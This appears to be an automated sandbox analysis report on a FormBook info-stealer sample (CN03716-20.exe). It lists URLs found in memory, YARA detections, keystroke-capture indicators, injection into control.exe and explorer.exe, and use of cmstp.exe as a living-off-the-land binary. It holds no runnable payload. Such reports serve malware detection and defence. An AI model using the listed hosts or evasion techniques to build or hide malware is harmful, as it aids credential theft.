BB=xd5c9Hx340PxZfq2bgHJvZwH7zKNcOjGm3kg8rd_cxsWXsmydm9GEagh8U4KQaYREDida5FAao8euCQZLDrR9AbYng6P8TX4CqKtRrGZcd80AztbpIBblqWIPGHOVC6WJVP_S71CedqcH_j4d9hyEcVDUdRdA-ppmswjtLReX_otBxLyqOwuVt8X7t3JjL~JaUCFteiF4q(_kwFVmIJW96z5WHNSSTjHUU6Gm9fcMe2qRMpsLqYTaJ7dqP0YK6BxkgufCsFLt2sX(w2JOgSnw4rSfQue1558dIFHgL2gogAKXPLfjpxP71kOullqI85gEaEj9br46fnpJNKp(6XS~OjMOFT_F-ne5JpDxEC99hkKAnVEP7lhxZQYPV9TFwV82Cn76Z99chjTWuBteoQssTo.
- Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Sep 2020 14:47:03 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: no-cachecontent-language: enx-wix-request-id: 1600699623.782789711115195vary: Accept-EncodingAge: 0X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjTybE2BzSWtM7HTFP9VFEC,2d58ifebGbosy5xc+FRaloPX4ngKfQM8fEHbwELHijnEXQ2/68Un6qnh1J4MeNs1WIHlCalF7YnfvOr2cMPpyw==,Nlv1KFVtIvAfa3AK9dRsI0uHmepHlxDNsmSKhfIbcIJWd3xniMsr1HjrszKGvMzr,2UNV7KOq4oGjA5+PKsX47FDtGCr72w4BMu4v3sd6ZGU=,qquldgcFrj2n046g4RNSVO41WPKnFMbc7ID/2Bjixvw=,LXlT8qjS5x6WBejJA3+gBV3rMnjOqLl2cZe24jK447KTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UOYNUEAXqn/WZl+iQhS1dpQ4tYPCIn0xdi8lnDzR9qKl0JDQPGidxH0yAUk8YNY2WIHlCalF7YnfvOr2cMPpyw==,LXlT8qjS5x6WBejJA3+gBV3rMnjOqLl2cZe24jK447KTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,IaDuTAMGGvhXtruM6nHg6saWad6chcA1IdKNJ2oysB5NG+KuK+VIZfbNzHJu0vJu,a3Wp9ZyujRzrXdcjNnttJroCVlUX3HA8CNXa/Wj4FZ9Y2J424u2BB5qsIDUDYaV+I5gzac6Ha/CTe5yTy9BfOQ==Server: Pepyaka/1.19.0Data Raw: 62 64 30 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 Data Ascii: bd0
Urls found in memory or binary data
- Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp String found in binary or memory: http://browsehappy.com/
- Source: CN03716-20.exe, 00000000.00000003.260996277.0000000005E09000.00000004.00000001.sdmp String found in binary or memory: http://en.w
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.257621308.0000000005E3D000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
- Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp String found in binary or memory: http://i.cdnpark.com/themes/registrar/791105.css
- Source: CN03716-20.exe, 00000000.00000002.290578484.0000000002EA1000.00000004.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.504570205.0000000003391000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
- Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
- Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comC
- Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comCon
- Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comS
- Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comVM
- Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp, CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
- Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comn-uD
- Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comnMD
- Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comv-s-
- Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comvMn
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
- Source: srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
- Source: CN03716-20.exe, 00000000.00000003.263942943.0000000005E33000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
- Source: CN03716-20.exe, 00000000.00000003.264788683.0000000005E0C000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlS
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
- Source: CN03716-20.exe, 00000000.00000003.266267384.0000000005E33000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designerss
- Source: CN03716-20.exe, 00000000.00000003.266267384.0000000005E33000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersy
- Source: CN03716-20.exe, 00000000.00000003.264319642.0000000005E33000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersz
- Source: CN03716-20.exe, 00000000.00000002.290344600.0000000001537000.00000004.00000040.sdmp String found in binary or memory: http://www.fontbureau.comF
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
- Source: CN03716-20.exe, 00000000.00000003.257242203.0000000005E3D000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com7
- Source: CN03716-20.exe, 00000000.00000003.257293184.0000000005E3D000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com8
- Source: CN03716-20.exe, 00000000.00000003.257143704.0000000005E3D000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comW
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
- Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnBM-
- Source: CN03716-20.exe, 00000000.00000003.259637169.0000000005E0E000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnI
- Source: CN03716-20.exe, 00000000.00000003.259751017.0000000005E11000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnS
- Source: CN03716-20.exe, 00000000.00000003.259488439.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cna-e.
- Source: CN03716-20.exe, 00000000.00000003.259488439.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnn-u
- Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnormN
- Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnr-t
- Source: CN03716-20.exe, 00000000.00000003.268205417.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
- Source: CN03716-20.exe, 00000000.00000003.271944510.0000000005E0B000.00000004.00000001.sdmp, CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
- Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp
String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: control.exe, 00000010.00000002.529344625.0000000004B29000.00000004.00000001.sdmp String found in binary or memory: http://www.lifecoachwoman.com Source: control.exe, 00000010.00000002.529344625.0000000004B29000.00000004.00000001.sdmp String found in binary or memory: http://www.lifecoachwoman.com/cmg/ Source: CN03716-20.exe, 00000000.00000003.267987189.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype. Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com2 Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.comS Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.comtM Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String 
found in binary or memory: http://www.sandoll.co.kr Source: srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: CN03716-20.exe, 00000000.00000003.260108438.0000000005E0C000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com5 Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.co Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn(M Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnCo: Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary 
or memory: http://www.zhongyicts.com.cnS Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnbr? Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnseV Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open Source: control.exe, 00000010.00000002.519302835.0000000000498000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Ll
 Creates a DirectInput object (often for capturing keystrokes)
 Source: CN03716-20.exe, 00000000.00000002.289598664.0000000001199000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

 Yara detected FormBook
 Source: Yara match File source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware
 Malicious sample detected (through community Yara rule)
 Contains functionality to call native functions
 Detected potential crypto function
 Found potential string decryption / allocating functions
 Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0447B150 appears 35 times
 Sample file is different than original file name gathered from version info
 Source: CN03716-20.exe Binary or memory string: OriginalFilename vs CN03716-20.exe
 Source: CN03716-20.exe, 00000000.00000000.252168488.000000000096F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamet07L.exe. vs CN03716-20.exe
 Source: CN03716-20.exe, 00000000.00000002.289598664.0000000001199000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs CN03716-20.exe
 Source: CN03716-20.exe, 00000000.00000002.298584201.0000000007EA0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs CN03716-20.exe
 Source: CN03716-20.exe, 00000000.00000002.298137296.0000000007980000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs CN03716-20.exe
 Source: CN03716-20.exe, 00000000.00000003.275250102.0000000001236000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEminem.dll< vs CN03716-20.exe
 Source: CN03716-20.exe, 00000000.00000002.298294757.0000000007B30000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameButterFly.dll< vs CN03716-20.exe
 Source: CN03716-20.exe, 00000000.00000002.298013346.00000000078D0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs CN03716-20.exe
 Source: CN03716-20.exe, 00000000.00000002.298013346.00000000078D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN03716-20.exe
 Source: CN03716-20.exe Binary or memory string: OriginalFilename vs CN03716-20.exe
 Source: CN03716-20.exe, 00000007.00000002.339108981.0000000000B1F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamet07L.exe. vs CN03716-20.exe
 Source: CN03716-20.exe, 00000007.00000002.340963412.00000000019A5000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs CN03716-20.exe
 Source: CN03716-20.exe, 00000007.00000002.340495405.000000000189F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CN03716-20.exe
 Uses a Windows Living Off The Land Binaries (LOL bins)
 Source: unknown Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
 Yara signature match